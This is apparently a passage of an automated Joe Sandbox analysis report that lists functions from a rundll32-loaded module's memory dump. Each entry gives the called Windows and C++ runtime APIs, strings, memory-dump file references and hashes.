std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8CF7DE
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8CF7EF
std::_Facet_Register.LIBCPMT ref: 00007FFDFA8CF819
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CF824

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 4235596951-0
Opcode ID: 76e464868b22df4bfb0fad985761b5743d3a4c2c0e63b734a575eb283c07df7a
Instruction ID: 14882c94acdc4d5ea4bf7a57eb1f8a964913b7eee1c1b2db29db79d67b4fbe0f
Opcode Fuzzy Hash: 76e464868b22df4bfb0fad985761b5743d3a4c2c0e63b734a575eb283c07df7a
Instruction Fuzzy Hash: 3931B522B1CA4281FB189B15E4608B86371EF84BE4F5942B2DA7D437EDDF2CE9468710

Function 00007FFDFA8CF83C Relevance: 10.6, APIs: 7, Instructions: 85COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CF85C
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CF881
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CF8AB
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8CF91A
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8CF92B
std::_Facet_Register.LIBCPMT ref: 00007FFDFA8CF955
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CF960

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$ExceptionFacet_RegisterThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 4235596951-0
Opcode ID: 38ac812af8c20da7b3d4da4cfdfb6955108cd6a367125b5b087cc807455946fd
Instruction ID: 2ea868866c2570ceb505088a76df6d6adcd49492571fa1f1f9c3d7ff6e09ffc5
Opcode Fuzzy Hash: 38ac812af8c20da7b3d4da4cfdfb6955108cd6a367125b5b087cc807455946fd
Instruction Fuzzy Hash: 89319322B18B0385FB189B15E4608B96370EF847E4F5942B2DA7D436EDCF2CE9568710

Function 00007FFDFA8AE3B4 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 70registrylibraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FFDFA8AE3F3
GetProcAddress.KERNEL32 ref: 00007FFDFA8AE408
RegOpenKeyExW.ADVAPI32 ref: 00007FFDFA8AE468
RegCloseKey.ADVAPI32 ref: 00007FFDFA8AE47A

Strings

Advapi32.dll, xrefs: 00007FFDFA8AE3EC
RegOpenKeyTransactedW, xrefs: 00007FFDFA8AE3FE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: AddressCloseHandleModuleOpenProc
String ID: Advapi32.dll$RegOpenKeyTransactedW
API String ID: 823179699-3913318428
Opcode ID: c8e40227ea93570c894c3257a732f5e36d0e2c3d26c8cd2adc3fe59e8dea6017
Instruction ID: 6a73f386a2ea44197d672760c7c38cff220afad1a9ca8df6f8515b2bde30c4ca
Opcode Fuzzy Hash: c8e40227ea93570c894c3257a732f5e36d0e2c3d26c8cd2adc3fe59e8dea6017
Instruction Fuzzy Hash: 3231B132B19F5286EB189F12E460B2963A4FF84B84F544475DA9D4BBA8CF7CE441C700

Function 00007FFDFA9A26CC Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FFDFA9A26FD
GetLastError.KERNEL32 ref: 00007FFDFA9A2709
CloseHandle.KERNEL32 ref: 00007FFDFA9A2721
CreateFileW.KERNEL32 ref: 00007FFDFA9A274C
WriteConsoleW.KERNEL32 ref: 00007FFDFA9A276B

Strings

CONOUT$, xrefs: 00007FFDFA9A272D

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 06dea905e064c22bbb5a36b741b5bf0aacda3c19f6d8a907d209e488b9782f22
Instruction ID: 11bfd8aee218645c9c297676581af51815cca6368295e54a94197be81d1222dc
Opcode Fuzzy Hash: 06dea905e064c22bbb5a36b741b5bf0aacda3c19f6d8a907d209e488b9782f22
Instruction Fuzzy Hash: 2E119322B18B4286E3548B56E864B2976A0FF98FE4F500275EE6D877E8CF3CD5448740

Function 00007FFDFA966E08 Relevance: 9.2, APIs: 6, Instructions: 212COMMONLIBRARYCODE

Download Yara Rule

APIs

MultiByteToWideChar.KERNEL32 ref: 00007FFDFA966E78
MultiByteToWideChar.KERNEL32 ref: 00007FFDFA966F39
__crtCompareStringEx.LIBCPMT ref: 00007FFDFA966F5E
__crtCompareStringEx.LIBCPMT ref: 00007FFDFA966FA5
__crtCompareStringEx.LIBCPMT ref: 00007FFDFA967052
WideCharToMultiByte.KERNEL32 ref: 00007FFDFA967090

Part of subcall function 00007FFDFA98CDC0: HeapAlloc.KERNEL32(?,?,?,00007FFDFA991566,?,?,00000000,?,?,00007FFDFA9918D2), ref: 00007FFDFA98CDFE

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: ByteCharCompareMultiStringWide__crt$AllocHeap
String ID:
API String ID: 3104693799-0
Opcode ID: 0f1e19b8d65444d44e6bd76e071c9cc3237529a2167c8bf0f863036bf27fc79c
Instruction ID: 27a5b9a15fd69de73ff620941e43711560c7a616ff7130537dc7c210f881c17b
Opcode Fuzzy Hash: 0f1e19b8d65444d44e6bd76e071c9cc3237529a2167c8bf0f863036bf27fc79c
Instruction Fuzzy Hash: F881C332B0574286EF288F259460A7962A1FF04BE8F944675EA3D87BCDEF3DE5058610

Function 00007FFDFA925E30 Relevance: 9.1, APIs: 6, Instructions: 132COMMON

Download Yara Rule

APIs

WideCharToMultiByte.KERNEL32 ref: 00007FFDFA925ECA
WideCharToMultiByte.KERNEL32 ref: 00007FFDFA925F55
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA925FB0
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA925FBF
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA925FCE
_invalid_parameter_noinfo_noreturn.LIBCMT ref: 00007FFDFA925FDA

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _invalid_parameter_noinfo_noreturn$ByteCharMultiWide
String ID:
API String ID: 469901203-0
Opcode ID: d83811cde9e9b156d4a607af37dc42f73d06dcad2c02b179441610010b2369ea
Instruction ID: 76002fe1d9d525138465a1e0d31fa9b70d8e75daef5957ec1e6fe049bf557532
Opcode Fuzzy Hash: d83811cde9e9b156d4a607af37dc42f73d06dcad2c02b179441610010b2369ea
Instruction Fuzzy Hash: 5851B132B08B8245F7289F29A52076A66D5BB457B0F644774DBBD83BE9CF7CE4918300

Function 00007FFDFA96CDC0 Relevance: 9.1, APIs: 6, Instructions: 73COMMON

Download Yara Rule

APIs

std::locale::_Init.LIBCPMT ref: 00007FFDFA96CDEA

Part of subcall function 00007FFDFA94B360: std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA94B381
Part of subcall function 00007FFDFA94B360: std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00007FFDFA94B395
Part of subcall function 00007FFDFA94B360: std::locale::_Setgloballocale.LIBCPMT ref: 00007FFDFA94B3A0
Part of subcall function 00007FFDFA94B360: _Yarn.LIBCPMT ref: 00007FFDFA94B3B7
Part of subcall function 00007FFDFA94B360: std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA94B404

new.LIBCMT ref: 00007FFDFA96CDFC
std::locale::_Locimp::_New_Locimp.LIBCPMT ref: 00007FFDFA96CE29
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA96CE4A
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA96CE75
_Yarn.LIBCPMT ref: 00007FFDFA96CEA3

Part of subcall function 00007FFDFA90DEB0: std::_Locinfo::_Locinfo.LIBCPMT ref: 00007FFDFA90DEE2
Part of subcall function 00007FFDFA90DEB0: _Getcvt.LIBCPMT ref: 00007FFDFA90DEEC
Part of subcall function 00007FFDFA90DEB0: std::_Locinfo::~_Locinfo.LIBCPMT ref: 00007FFDFA90DF15

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: std::_$Lockitstd::locale::_$LocimpLocimp::_LocinfoLockit::_Lockit::~_New_Yarn$GetcvtInitLocinfo::_Locinfo::~_Setgloballocale
String ID:
API String ID: 1485638866-0
Opcode ID: 863b2f87250785c926ac0a19c2a7fcacb030f4d1ddc856f22f2c19e3484d1c34
Instruction ID: c83ef3038f4c196eecd2ab53848c1f4aa87cfb20d23d130dfcca1be4aafd9fd9
Opcode Fuzzy Hash: 863b2f87250785c926ac0a19c2a7fcacb030f4d1ddc856f22f2c19e3484d1c34
Instruction Fuzzy Hash: FD31A771B09B4681EB19DB51E46067A73A0EF88BE4F4481B5EA6D87BDDDF3CE8418340

Function 00007FFDFA8CE4C0 Relevance: 9.1, APIs: 6, Instructions: 66COMMONLIBRARYCODE

Download Yara Rule

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CE4E1
std::_Lockit::_Lockit.LIBCPMT ref: 00007FFDFA8CE501
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CE52B
std::bad_alloc::bad_alloc.LIBCMT ref: 00007FFDFA8CE582
_CxxThrowException.LIBVCRUNTIME ref: 00007FFDFA8CE593
std::_Lockit::~_Lockit.LIBCPMT ref: 00007FFDFA8CE59E

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Lockitstd::_$Lockit::_Lockit::~_$ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 757808775-0
Opcode ID: cdee22700f4af7c920615568f9d95e85933a1f775d972027639bb7f8d232b87c
Instruction ID: fd4a6de5c8dd8a1e4ced8e96d7f0ee4c36a050cee7b1d6f22f207012a16ab958
Opcode Fuzzy Hash: cdee22700f4af7c920615568f9d95e85933a1f775d972027639bb7f8d232b87c
Instruction Fuzzy Hash: AF31D121B19A0281EB18CB19D4608B83371EB98BD4F5901B2DA3D977EDEE6CE9468700

Function 00007FFDFA994C28 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 157timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

_get_daylight.LIBCMT ref: 00007FFDFA994C4B

Part of subcall function 00007FFDFA994504: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA994518

_get_daylight.LIBCMT ref: 00007FFDFA994C5C

Part of subcall function 00007FFDFA9944A4: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA9944B8

_get_daylight.LIBCMT ref: 00007FFDFA994C6D

Part of subcall function 00007FFDFA9944D4: _invalid_parameter_noinfo.LIBCMT ref: 00007FFDFA9944E8

Part of subcall function 00007FFDFA98FDD0: HeapFree.KERNEL32(?,?,00007FFDFA98C6EF,00007FFDFA99CD14,?,?,?,00007FFDFA99D097,?,?,00004C255E491641,00007FFDFA99C190,?,?,?,00007FFDFA99C0C3), ref: 00007FFDFA98FDE6
Part of subcall function 00007FFDFA98FDD0: GetLastError.KERNEL32(?,?,00007FFDFA98C6EF,00007FFDFA99CD14,?,?,?,00007FFDFA99D097,?,?,00004C255E491641,00007FFDFA99C190,?,?,?,00007FFDFA99C0C3), ref: 00007FFDFA98FDF8

GetTimeZoneInformation.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,?,00000000,?,00007FFDFA994EA1), ref: 00007FFDFA994C94

Strings

?, xrefs: 00007FFDFA994D66

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: _get_daylight_invalid_parameter_noinfo$ErrorFreeHeapInformationLastTimeZone
String ID: ?
API String ID: 3458911817-1684325040
Opcode ID: ac8d0a06039518470155512149dd8b5248a90ad546de6605d03d21784e426ad6
Instruction ID: 462e5a7f1b7dfb93d2f2fa3bdbac5c005f256887f5b9ac85e625969db27b6645
Opcode Fuzzy Hash: ac8d0a06039518470155512149dd8b5248a90ad546de6605d03d21784e426ad6
Instruction Fuzzy Hash: 4561E636B0864295E729DF21E8609B97794FB8C788F840172EA2D836DDDF3CE441C750

Function 00007FFDFA969080 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 153libraryloadertimeCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,?,?,?,00000020,00000000,?,00007FFDFA969596,?), ref: 00007FFDFA9690BA
GetProcAddress.KERNEL32(?,?,?,?,?,00000020,00000000,?,00007FFDFA969596,?), ref: 00007FFDFA9690CA
SystemTimeToFileTime.KERNEL32(?,?,?,?,?,?,?,00000020,00000000,?,00007FFDFA969596,?), ref: 00007FFDFA969269

Strings

KERNEL32.DLL, xrefs: 00007FFDFA9690B3
GetTickCount64, xrefs: 00007FFDFA9690C3

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: Time$AddressFileHandleModuleProcSystem
String ID: GetTickCount64$KERNEL32.DLL
API String ID: 1325709388-3320051239
Opcode ID: e5f6e237485dc9fb21dbce2a5ed82c903e844033b7c074c3668ca47f24bd9165
Instruction ID: 5d47afbc908078c957f187cc620219a69a551c54788002dbffddc4abb74c0ce6
Opcode Fuzzy Hash: e5f6e237485dc9fb21dbce2a5ed82c903e844033b7c074c3668ca47f24bd9165
Instruction Fuzzy Hash: DA51A4A6F2571685EF08CBA5E8605ED6371BF48BC8B445032EE1E5BB9DEE3CD1058340

Function 00007FFDFA8CE890 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMON

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8D051C: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8D058E

Part of subcall function 00007FFDFA946700: EnterCriticalSection.KERNEL32 ref: 00007FFDFA946710

new.LIBCMT ref: 00007FFDFA8CE960

Part of subcall function 00007FFDFA8D0048: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8D00BA

_Init_thread_footer.LIBCMT ref: 00007FFDFA8CE9C3

Strings

bad exception, xrefs: 00007FFDFA8CE8CD
C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp, xrefs: 00007FFDFA8CE90D
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void), xrefs: 00007FFDFA8CE902

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

Associated: 00000005.00000002.4126069313.00007FFDFA8A0000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126296985.00007FFDFA9D1000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126373758.00007FFDFAA4E000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126408776.00007FFDFAA52000.00000008.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126443351.00007FFDFAA5F000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126483850.00007FFDFAA93000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126518283.00007FFDFAA98000.00000004.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126552175.00007FFDFAA9D000.00000002.00000001.01000000.00000005.sdmpDownload File
Associated: 00000005.00000002.4126589237.00007FFDFAAAD000.00000002.00000001.01000000.00000005.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ffdfa8a0000_rundll32.jbxd

Similarity

API ID: __std_exception_copy$CriticalEnterInit_thread_footerSection
String ID: C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp$bad exception$class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_exception_>(void)
API String ID: 573191702-3549958519
Opcode ID: 18ebbcfcad57d23ea068809c0a41672d51838ec3cec67efa072cbf0e14909f5c
Instruction ID: a9b9fa892ac050e1b7c66b4251ce3be110ebcfa8df0d98c64ecd699a415eb7fa
Opcode Fuzzy Hash: 18ebbcfcad57d23ea068809c0a41672d51838ec3cec67efa072cbf0e14909f5c
Instruction Fuzzy Hash: 95514C32B14F0289EB14CF64E8A06A833B5FB48758F804276CA6D537E9EF38E559C340

Function 00007FFDFA8CE6D0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 97COMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 00007FFDFA8D0670: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8D06E2

Part of subcall function 00007FFDFA946700: EnterCriticalSection.KERNEL32 ref: 00007FFDFA946710

new.LIBCMT ref: 00007FFDFA8CE7A0

Part of subcall function 00007FFDFA8CFF30: __std_exception_copy.LIBVCRUNTIME ref: 00007FFDFA8CFFA2

_Init_thread_footer.LIBCMT ref: 00007FFDFA8CE803

Strings

C:\dvs\p4\build\sw\tools\boost\boost-1.62.0\boost/exception/detail/exception_ptr.hpp, xrefs: 00007FFDFA8CE74D
bad allocation, xrefs: 00007FFDFA8CE70D
class boost::exception_ptr __cdecl boost::exception_detail::get_static_exception_object<struct boost::exception_detail::bad_alloc_>(void), xrefs: 00007FFDFA8CE742

Memory Dump Source

Source File: 00000005.00000002.4126105211.00007FFDFA8A1000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FFDFA8A0000, based on PE: true

